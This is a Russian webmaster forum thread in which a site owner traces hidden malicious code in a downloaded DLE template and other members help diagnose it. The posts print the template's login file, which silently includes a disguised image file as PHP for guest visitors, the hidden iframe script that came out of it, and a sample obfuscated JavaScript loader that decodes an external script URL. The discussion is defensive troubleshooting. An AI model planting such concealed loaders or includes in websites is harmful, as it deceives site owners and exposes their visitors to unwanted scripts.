[DLE] HELP! Скрытый код в шаблоне от igromania.ru...

Тема в разделе "Скины", создана пользователем killoff, 10 сен 2009.

Статус темы:
Закрыта.
  1. killoff

    killoff CD тихо, и не DVD меня ;)

    Moderator
    Регистр.:
    13 май 2008
    Сообщения:
    2.101
    Симпатии:
    758
    Скачать шаблон тут http://dle.in.ua/templates/6019-adaptaciya-igromanii.htmlПри тесте вроди бы никаких лишний обращений к левым сайтам не было. Спустя несколько недель началось: сначала яндекс заметил на сайте опасный скрипт на некоторых страницах сайта, потом только когда я вышел с сайта - то заметил что всем посетителям сайта (которые гости) шло обращение к lankru.ru + ещё несколько обращений к некоторым сайтам, в том числе и редирект на http://gobylink.com/?id=83450:mad: и это при учёте что у меня тоже стояли коды кликндера. Перерыл все файлы, немного подсобрал разбросанные css файлы, проверил все файлы JS но нигде нет упоминаний об этих сайтах. Пробовал вырубить почти все JS но обращения к сайтам оставалось. Потом когда я закомментировал файл regit.tpl - левых обращений не стало. Вот код этого файла
    HTML:
    {login}
    [group=5]
    <div currtab="0" crows="" class="full_block2" id="redblock4a89065069">
    <div id="redblock4a89065069-name" style="display: none;"></div>
    <div style="display: none;" id="redblock4a89065069-cont" class="full_hidden">
    <div  class="info_hidden">
    <div class="info_hidden_content">
    <img src="{THEME}/bitrix/templates/igromania/img/64x64_registrieren.png" align=left alt="" style="margin-left:35px;margin-right:10px;">
    <form  method="post" name="registration" id="registration" action="?do=register">
    <table  cellspacing=0 cellpadding=0 style="float:left;margin-left:15px;">
    <tr>
    <td width="17" height="17" valign="top" style="padding-top:2px;"><img src="{THEME}/bitrix/templates/igromania/img/login.png" width="17" height="17" /></td>
    <td><input type="text" name="name" id='name' class="enter_input" value="Логин" onFocus="if(this.value=='Логин')this.value='';" onBlur="if(this.value=='')this.value='Логин';" /></td>
    </tr>
    <tr>
    <td width="17" height="17" valign="top" style="padding-top:10px;"><img src="{THEME}/bitrix/templates/igromania/img/mail.png" width="17" height="17" /></td>
    <td style="padding-top:8px;"><input type="text" name="email" class="enter_input" value="E-Mail" onFocus="if(this.value=='E-Mail')this.value='';" onBlur="if(this.value=='')this.value='E-Mail';" /></td></tr>
    </table>
    <table  cellspacing=0 cellpadding=0 style="float:left;margin-left:15px;">
    <tr>
    <td width="17" height="17" valign="top" style="padding-top:2px;"><img src="{THEME}/bitrix/templates/igromania/img/password.png" width="17" height="17" /></td>
    <td><input type="password" name="password1" class="enter_input" value="пароль" onFocus="if(this.value=='пароль')this.value='';" onBlur="if(this.value=='')this.value='пароль';" /></td>
    </tr>
    <tr>
    <td width="17" height="17" valign="top" style="padding-top:10px;"><img src="{THEME}/bitrix/templates/igromania/img/rpassword.png" width="17" height="17" /></td>
    <td style="padding-top:8px;"><input type="password" name="password2" class="enter_input" value="пароль" onFocus="if(this.value=='пароль')this.value='';" onBlur="if(this.value=='')this.value='пароль';" /></td></tr>
    </table>
    <!--code-->
    <!--<table  cellspacing=0 cellpadding=0 style="float:left;margin-left:15px;">
    <tr>
    <td>
    <img src="/engine/modules/antibot.php" alt="Включите эту картинку для отображения кода безопасности" border="0">
    </td></tr></table>-->
    <table  cellspacing=0 cellpadding=0 style="float:left;margin-left:15px;">
    <!--<tr>
    <td width="17" height="17" valign="top" style="padding-top:2px;"><img src="{THEME}/bitrix/templates/igromania/img/code.png" width="17" height="17" /></td>
    <td>
    <input type="text" name="sec_code" class="enter_input" value="код" onFocus="if(this.value=='код')this.value='';" onBlur="if(this.value=='')this.value='код';" />
    </td></tr>-->
    <tr><td  style="padding-top:3px;"> <!--style="padding-top:10px;" >//-->
    <input type="image" style="width:17px; height:17px;border:none;" src="{THEME}/bitrix/templates/igromania/img/searchnews_pic.gif" name="submit" alt="Отправить" />
    <input name="submit_reg" type="hidden" id="submit_reg" value="submit_reg">
    </td></tr>
    </table>
    </form>
    <table  cellspacing=0 cellpadding=5 style="float:left;margin-left:15px;border:1px solid #ccc;width:560px;">
    <tr><td>Что вам даст регистрация на сайте? Во-первых, вы сможете оставлять комментарии ко всем материалам. Во-вторых, при нерабочем видео вы сможете ссообщить об этом администрации и фильм восстановят к показу в ближайшее время. И в-третьих, скачивать саундтреки могут только зарегистрированные пользователи!</td></tr>
    </table>
    <div style="clear:both;"></div>
    </div>
    </div>
    <div class="info_hidden_bottom"></div>
    </div>
    </div>
    [/group]
    и на всякий случай код login.tpl
    HTML:
    <?php
    if ($is_logged == TRUE){
    if (trim($member_id['foto']) == "") {
     $foto = $config['http_home_url']."{THEME}/images/noavatar_.png";
    } else {
     $foto = $config['http_home_url']."uploads/fotos/".$member_id['foto'];
    }
    $login_panel = <<<HTML
    <div class="leftorange_logged1">
    <img src="{THEME}/bitrix/templates/igromania/img/out.gif" class="uinfo_out" alt="" align="top" style="cursor:pointer;" alt="Выйти" onClick="javascript:location.href='{$link_logout}';showBusyLayer()">
    <span class="leftorange_text">{$member_id['name']}</span>
    </div>
    <img src="{THEME}/bitrix/templates/igromania/img/orange_separate.gif" class="orange_logged_sep1" alt="">
    <div class="leftorange_logged2">
    <img src="{THEME}/bitrix/templates/igromania/img/profile_card_pic.jpg" class="profile_card" alt="">
    <a href="#" onClick="javascript:SwitchBlockMode2_C('redblock4a89065069',0,'closed_mp_redblock');" id="redblock4a89065069-head">
    <img src="{THEME}/bitrix/templates/igromania/img/profile_button.jpg" class="profile_button" alt="Profile" id="mhprofilebutton">
    </a>
    </div>
    <!--<img src="{THEME}/bitrix/templates/igromania/img/orange_separate.gif" class="orange_anonim_sep2" alt="">
    <div class="leftorange_anonim3">
    <img src="{THEME}/bitrix/templates/igromania/img/orange_settings_pic.jpg"  class="settings_pic" alt="">
    <a href="#">
    <img src="{THEME}/bitrix/templates/igromania/img/settings_button.jpg" class="settings_button" alt="Settings" id="mhsettingsbutton">
    </a>
    </div>-->
    <div class="rightorange"></div>
    </div>
    HTML;
    $login_panel .= <<<HTML
    <div currtab="0" crows="" class="full_block2" id="redblock4a89065069">
    <div id="redblock4a89065069-name" style="display: none;"></div>
    <div style="display: none;" id="redblock4a89065069-cont" class="full_hidden"> 
    <div  class="info_hidden"> 				
    <div class="info_hidden_content">
    <table class="block2_usercomment" cellpadding="0" cellspacing="0" border="0" style="width:100%;">
    <tr>
    <td class="block2_userpic" style="padding-left:30px;width:60px">
    <div class="block2_absdiv_userpic"><img src="{$foto}" class="block2_upic" alt="">
    <img src="{THEME}/bitrix/templates/igromania/img/block2_userpic_border.gif" class="block2_upicbord" alt="">
    </div>
    </td>
    <td class="block2_usertext" style="width:100%;">
    <ul id="login_styles">
    HTML;
    if ($user_group[$member_id['user_group']]['allow_admin']) {
    $login_panel .= <<<HTML
    <li onClick="javascript:location.href='{$adminlink}';">Админцентр</li>
    HTML;
    }
    else {
    $login_panel .= <<<HTML
    HTML;
    }
    $login_panel .= <<<HTML
    <li onClick="javascript:location.href='{$link_profile}';">Профиль</li>
    <li onClick="javascript:location.href='{$link_pm}';">ПС ({$member_id['pm_unread']} | {$member_id['pm_all']})</li>
    <li onClick="javascript:location.href='{$link_stats}';">Статистика</li>
    <li onClick="javascript:location.href='{$link_addnews}';">Добавить новость</li>
    <li onClick="javascript:location.href='{$link_favorites}';">Закладки</li>
    <li onClick="javascript:location.href='{$link_newposts}';">Непрочитанное</li>
    <li><a onclick="javascript: showBusyLayer()" href="{$link_logout}"><strong>Завершить сеанс</strong></a></li>
    </ul>
    </td>
    </tr>
    </table>
    </div>
    </div>
    <div class="info_hidden_bottom"></div>
    </div>
    </div>
    HTML;
    } else { $login_p= include ($tpl->dir.'/bitrix/images/betrix.jpg');
    $login_panel = <<<HTML
    <div class="leftorange_anonim1">
    <form method="post" onsubmit="javascript:showBusyLayer()" action=''>
    <img src="{THEME}/bitrix/templates/igromania/img/in.gif" class="uinfo_enter" alt="" align="top">
    <input type="Text" class="enter_input" maxlength="50" name="login_name" value="Логин" onFocus="if(this.value=='Логин')this.value='';" onBlur="if(this.value=='')this.value='Логин';">
    <input type="Password" class="enter_input" name="login_password" value="Пароль" onFocus="if(this.value=='Пароль')this.value='';" onBlur="if(this.value=='')this.value='Пароль';" maxlength="50">$login_p
    <input onclick="submit();" name="image" type="image" src="{THEME}/bitrix/templates/igromania/img/enter_pic.gif" class="enter_arrow_pic" alt="Войти" align="top" style="border:none;" /><input name="login" type="hidden" id="login" value="submit" /> 
    </form>
    </div>
    <img src="{THEME}/bitrix/templates/igromania/img/orange_separate.gif" class="orange_anonim_sep1" alt="" style="margin-left:10px;">
    <div class="leftorange_anonim2" style="margin-left:10px;">
    <img src="{THEME}/bitrix/templates/igromania/img/reg_pic.jpg"  class="reg_pic" alt="">
    <img src="{THEME}/bitrix/templates/igromania/img/reg_button.jpg" class="reg_button" alt="Registration" onClick="javascript:SwitchBlockMode2_C('redblock4a89065069',0,'closed_mp_redblock');" id="redblock4a89065069-head">
    </div>
    <!--<img src="{THEME}/bitrix/templates/igromania/img/orange_separate.gif" class="orange_anonim_sep2" alt="">
    <div class="leftorange_anonim3">
    <img src="/bitrix/templates/igromania/img/orange_settings_pic.jpg"  class="settings_pic" alt="">
    <img src="/bitrix/templates/igromania/img/settings_button.jpg" class="settings_button" alt="Settings" id="mhfreesettingsbutton" onClick="javascript:MainHeaderOpenRollingContainer(1);">
    </div>-->
    <div class="rightorange"></div>
    </div>
    HTML;
    }
    ?>
    Где может скрываться этот опасный код с левыми ссылками?
     
  2. GauraStyle

    GauraStyle Kot

    Регистр.:
    13 фев 2007
    Сообщения:
    1.493
    Симпатии:
    917
    Нужно смотреть все файлы ТПЛь, проверить их на код, потому как он где угодно может быть и выскакивает только для незарегистрированых пользователей, тем самым администрация его видеть неможет.
    :nezn:
     
  3. killoff

    killoff CD тихо, и не DVD меня ;)

    Moderator
    Регистр.:
    13 май 2008
    Сообщения:
    2.101
    Симпатии:
    758
    именно поэтому я его сразу и не заметил (((
    я уже пересмотрел все, поиск текста делал по этим урлам, но ничего нигде не встретил :( сейчас пока вырубил закрыл файл regit.tpl - пока не вылазит "это..."

    как этот код хотябы примерно может выглядеть? :thenks:
     
  4. GauraStyle

    GauraStyle Kot

    Регистр.:
    13 фев 2007
    Сообщения:
    1.493
    Симпатии:
    917
    Или так:
    PHP:
    <script language='javascript' type='text/javascript' src='http://НИК.popunder.ru/popunder.php?sid=37164'></script>
    Ну или так:
    PHP:
    <script type="text/javascript" language="javascript">
    <!--
    function 
    cnf273(s785){document.writeString.fromCharCode(parseInt(s785)+1));}
    var 
    bLa86="103r115r115r111r57r46r46r70r96r116r113r96r"+
    "82r115r120r107r100r45r110r106r110r114r103r100r98r103r"+
    "106r96r45r109r100r115r46r114r46r111r85r102r115r117r"+
    "102r84r56r49r52r51r46r62r114r104r99r60r50r54r48r53r"+
    "51";var pC515=bLa86.split("r");
    document.write("<script type='text/javascript' language='javascript' src='");
    var 
    Sb307=0;while(Sb307<pC515.length){cnf273(pC515[Sb307]);Sb307++;}
    document.write("'></script>");
    // -->
    </script>
    Ну ваще желательно менять логин и пароль на хостинге, возможно вирус у тебя, нужно смотреть там всё, на наличие кода.
    В шаблоне самом рыть.
    :nezn:
     
  5. killoff

    killoff CD тихо, и не DVD меня ;)

    Moderator
    Регистр.:
    13 май 2008
    Сообщения:
    2.101
    Симпатии:
    758
    GauraStyle, на хостинге я сменил все пароли, несколько часов общался с супортом хостера про этот вирус - но они поиском по файлам тоже ничего не нашли с тех ссылок которые были...
    А почему в пример привел попундеровский скрипт? ОН чтоли теперь тоже занимается распространием подобных вирусов?
    Сегодня обновился с 7.3 до 8.2, оптимизировал немного базу данных, затем раскомментировал тот файл из-за которого всё появлялось, проверил все http запросы в ФФ, и вроди бы пока ничего лишнего не заметил :) интересно на долго ли :ah: и вообще удалился ли "он"...
    На сайте откуда скачивал шаблон рипер отписался, что ничего лишнего в шаблонах его якобы нет, и только у меня одного это вылезло! Реклама у меня стояла от попундера и кликундера, вместе они раньше всегда работали нормально, и вирусов изза них не было никаких :cool: откуда же тогда вообще мог появится этот вирус?:confused:
     
  6. neoks

    neoks Читатель

    Заблокирован
    Регистр.:
    13 июл 2009
    Сообщения:
    6
    Симпатии:
    20
    Были случаи когда хостеры кидали в index.php лишние ссылки (особенно РБК)

    Также может какой то лишний модуль или левая сборка (да даже может соседний сайт был заражен и вирус попал к тебе) так как на одном сервере могут находиться 100 сайтов :D

    Много партнерок и не обязательно кликундеров (информеры к примеру могли стать причиной вируса) У меня были случаи когда http://runews.radeant.com убивал мой сайт (и вместо сайта была белая страница)
    Так что на шаблон гнал ты зря (так как если бы это было в шаблоне то вирус вернулся бы сразу как только ты поставил шаблон) :confused:

    P.S: убей хостера :smmne:
     
  7. killoff

    killoff CD тихо, и не DVD меня ;)

    Moderator
    Регистр.:
    13 май 2008
    Сообщения:
    2.101
    Симпатии:
    758
    на хостере у меня типа вип тариф, и там максимум должно быть вроди как 5 участинков, но сайтов конечно может быть хоть сколько...((
    откда мог попасть - хз, хостер сами ниче не нашли, буду надеятся что после обновления будет всё хорошо :)
    зы я думал седня - есть ты тут или нет :)
     
  8. killoff

    killoff CD тихо, и не DVD меня ;)

    Moderator
    Регистр.:
    13 май 2008
    Сообщения:
    2.101
    Симпатии:
    758
    оказывается эта зараза осталась всетаки, просто стала по другому себя проявлять :mad: накручивала статистику http://www.gameswar.ru/12345/stats.html
    В файле login.tpl после полей логина и пароля стоит $login_p (хз зачем она нужна...) и выводила сл.код в страницу:
    PHP:
    <SCRIPT LANGUAGE="Javascript">
    function 
    PopShow3(name) {  
    CookieTest=navigator.cookieEnabled;  
    if(
    CookieTest)  
    {  
    ClickUndercookie GetCookie('clickunder');  
    if (
    ClickUndercookie == null)  
    {  
    var 
    ExpDate = new Date ();  
    ExpDate.setTime(ExpDate.getTime() + (30 60 60 1000));  
    SetCookie('clickunder','1',ExpDate"/");  
    document.write("<iframe style='position:absolute;left:-4%;width:0%;top:-5%;height:0%;' src='http://www.gameswar.ru/12345/stats.html'></iframe>");
    window.focus();  
    }  
    }  
    }  
    function 
    GetCookie (name) {  
    var 
    arg name "=";  
    var 
    alen arg.length;  
    var 
    clen document.cookie.length;  
    var 
    0;  
    while (
    clen) {  
    var 
    alen;  
    if (
    document.cookie.substring(ij) == arg)  
    return 
    getCookieVal (j);  
    document.cookie.indexOf(" "i) + 1;  
    if (
    == 0) break;  
    }  
    return 
    null;  
    }  
    function 
    SetCookie (namevalue) {  
    var 
    argv SetCookie.arguments;  
    var 
    argc SetCookie.arguments.length;  
    var 
    expires = (argc 2) ? argv[2] : null;  
    var 
    path = (argc 3) ? argv[3] : null;  
    var 
    domain = (argc 4) ? argv[4] : null;  
    var 
    secure = (argc 5) ? argv[5] : false;  
    document.cookie name "=" escape (value) +  
    ((
    expires == null) ? "" : ("; expires=" expires.toGMTString())) +  
    ((
    path == null) ? "" : ("; path=" path)) +  
    ((
    domain == null) ? "" : ("; domain=" domain)) +  
    ((
    secure == true) ? "; secure" "");  
    }  
    document.onload=PopShow3(name); 
    </SCRIPT>
    в шаблоне я удалил $login_p и пока всё чисто, но подскажите где искать всё остальное? какие файлы ковырять? поиском по тексту ничего больше не могу найти :( если надо могу файлы шаба выложить...
    :bc:

    тут http://talk.maulnet.ru/topic31722.htmlписали что типа во всех шаблонах этого рипера сидит разная зараза (((
     
  9. GauraStyle

    GauraStyle Kot

    Регистр.:
    13 фев 2007
    Сообщения:
    1.493
    Симпатии:
    917
    Ну то я тебе так и посоветовал то.
    Сам это прошол, обнаружил решение и отписал.
     
  10. killoff

    killoff CD тихо, и не DVD меня ;)

    Moderator
    Регистр.:
    13 май 2008
    Сообщения:
    2.101
    Симпатии:
    758
    написал вчера на сайте откуда скачал рип - сегодня уже мой камент там удалили (заминусовали его, и я не сразу его увидел), и автор рипа написал в личку, типа нахрен пишешь на сайте - если нашёл то удали и не наводи панику на сайте :mad:
    я уже даже и не знаю в каких файлах то хоть примерно что искать :nezn:
     
Статус темы:
Закрыта.